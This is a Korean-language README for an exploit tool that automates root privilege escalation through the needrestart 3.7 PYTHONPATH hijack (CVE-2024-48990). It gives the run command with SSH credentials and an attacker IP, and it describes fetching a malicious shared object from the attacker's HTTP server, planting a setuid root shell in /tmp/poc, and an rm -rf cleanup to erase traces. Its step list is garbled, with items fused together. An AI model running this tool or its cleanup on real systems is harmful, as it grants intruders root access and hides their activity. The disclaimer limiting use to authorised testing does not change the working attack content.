
CVE-2024-48990(needrestart v3.7)에 대한 자동화된 로컬 권한 상승 익스플로잇으로, PYTHONPATH 하이재킹을 활용하여 루트 액세스를 획득합니다.
이 도구는 CVE-2024-48990으로 식별된 needrestart 3.7 버전의 권한 상승 취약점 악용을 자동화합니다.
needrestart가 Python 프로세스를 스캔할 때 PYTHONPATH 환경 변수의 안전하지 않은 사용을 이용하여 루트 실행을 달성합니다.
익스플로잇은 다음 방식으로 작동합니다:
__init__.so)를 컴파일합니다..so를 제공합니다.PYTHONPATH 환경을 준비합니다.importlib을 임포트하는 Python 미끼 프로세스를 실행합니다.PYTHONPATH를 상속받은 needrestart를 실행하면 악성 모듈을 로드하고 페이로드를 루트로 실행합니다./tmp/poc)를 생성하여 루트 셸 접근을 허용합니다.공격자 머신에서 익스플로잇을 실행합니다:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
매개변수:
needrestart 버전 3.7대상에서 익스플로잇 흔적을 제거하려면:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc (페이로드 컴파일용)python3 -m http.server (스크립트가 자동으로 시작)needrestart (v3.7)/usr/sbin/needrestart에 대해 sudo NOPASSWD 권한이 있는 루트가 아닌 사용자curl 설치이 도구는 교육 및 권한이 부여된 보안 테스트 목적으로만 제공됩니다. 소유하지 않았거나 명시적 허가 없이 시스템에 사용하지 마십시오.